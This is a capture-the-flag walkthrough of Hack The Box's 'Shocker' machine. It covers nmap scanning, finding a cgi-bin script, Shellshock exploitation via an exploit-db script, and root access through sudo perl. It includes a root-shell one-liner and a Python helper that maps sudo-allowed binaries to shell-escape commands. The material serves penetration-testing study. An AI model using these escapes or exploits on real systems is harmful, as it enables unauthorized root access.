Hack The Box — Shocker — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
4 min read · Apr 29, 2023

This is my 6th write-up, this time for Shocker, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we first need to gather some information about it. For that we use Nmap to scan the target’s ports and find out which services are running; those services are what we will target.

nmap -sC -sV -O -A -T4 10.129.58.135

  • -sC runs the default NSE scripts to enumerate the discovered services further.
  • -sV enumerates the version of each service.
  • -O enables OS detection (redundant when -A is used, but harmless).
  • -A is the aggressive scan: it enables -O, -sV, -sC and a traceroute. It is noisy, so it is not usually recommended in a real engagement.
  • -T4 selects the “aggressive” timing template, which speeds the scan up with shorter timeouts and more parallelism (it does not set a thread count).
  • -Pn skips host discovery and scans even if the machine does not answer ICMP (ping) probes. It is not in the command above, but add it if Nmap reports the host as down.

We can see an Apache Web Server is running on Port 80 and an SSH server is running on non-standard port 2222 (usually SSH runs on port 22).

Let’s see what we have on the web server.

There’s just an image with the text “Don’t bug me!”. I looked at the source code and the HTTP headers but couldn’t find anything useful.

Let’s try directory busting using dirbuster with the directory-list-lowercase-2.3-medium.txt wordlist.

Here we found a cgi-bin directory with response 403 (Forbidden). That means we cannot list or browse the directory itself, but files inside it may still be reachable by name. Also, the machine name “Shocker” together with an enabled cgi-bin strongly hints at the Shellshock vulnerability.

For Shellshock (CVE-2014-6271) to be exploitable through a web server, cgi-bin has to be enabled and contain a script that is run by (or invokes) a vulnerable version of bash; the web server passes request headers to the script as environment variables, which is how an attacker-controlled string reaches bash. More about Shellshock here: https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf

Let’s see if we have any script inside cgi-bin, using dirbuster again.

This time our starting directory is /cgi-bin/, because we are looking for files specifically in that directory. We also extend the file extensions from just php to php, cgi, sh, js and asp so that any script with one of those extensions is found.

So we found a user.sh script inside the cgi-bin directory. That is most likely the script we need to trigger the Shellshock exploit against.

Initial Foothold

First let’s look at the script that we have.

It seems like this is just a test script to display service uptime.

Searching exploit-db for shellshock leads us to the following exploit.

https://www.exploit-db.com/exploits/34900

Let’s download it and run it with python2, since it is written in Python 2.

This script accepts several arguments, which are defined here. We need the rhost, rport, lhost, lport, pages and payload arguments to run this exploit: the target host and port, our listener’s host and port, the CGI page to hit (/cgi-bin/user.sh) and the payload type. Since we know all of these, let’s run the exploit with the required arguments.

We got a shell!

It looks like we have a shell as user shelly.

Let’s escalate our privileges to get root access.

Privilege Escalation

As usual, first I would like to see what commands can shelly run as root user using sudo.

sudo -l

It looks like the current user shelly can run perl as root via sudo. I know how to spawn a shell from perl, so being able to run perl as root makes it very easy to get a root shell.
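The same check generalises to any box: read the sudo -l output, find every command that runs as root, and see whether it is a binary that can spawn a shell. The following is an added example (not the author’s code) that automates that step. The sudo -l text is a constructed sample modelled on what sudo prints, with two extra entries added to show the parser handling them; the escape table covers a handful of well-known binaries and is not exhaustive.

```python
import os
import re

# Constructed sample of "sudo -l" output. The first command entry mirrors
# the situation on the box; the other two are added to exercise the parser.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/less
    (ALL : ALL) ALL
"""

# One sudoers entry per line: "(runas[:group]) [TAG: ...] cmd1, cmd2, ..."
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Known ways to get a shell out of a binary when it runs as root.
SHELL_ESCAPES = {
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "python": "sudo python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    "less": "sudo less /etc/profile   # then type !/bin/sh at the prompt",
    "vim": "sudo vim -c ':!/bin/sh'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "ALL": "sudo -i",
}


def parse_sudo_l(text: str):
    """Return a list of (runas_user, nopasswd, command) from sudo -l output."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        # Everything before this marker is Defaults noise (env_reset, secure_path...).
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()      # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            entries.append((runas, nopasswd, cmd.strip()))
    return entries


def root_shell_candidates(entries):
    """Keep entries that run as root and whose binary has a known shell escape."""
    found = []
    for runas, nopasswd, cmd in entries:
        if runas not in ("root", "ALL"):
            continue
        name = cmd if cmd == "ALL" else os.path.basename(cmd.split()[0])
        if name in SHELL_ESCAPES:
            found.append((cmd, nopasswd, SHELL_ESCAPES[name]))
    return found


if __name__ == "__main__":
    for cmd, nopasswd, escape in root_shell_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if nopasswd else "password required"
        print(f"{cmd:20} [{tag}] -> {escape}")
```

The NOPASSWD flag matters in practice: the perl entry on this box needs no password, so the escape works from a non-interactive Shellshock shell; an entry without it would first require shelly’s password, which we do not have.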

sudo perl -e 'exec "/bin/sh";'

And we got a root shell!

Let’s collect the root flag.

EZ! :)
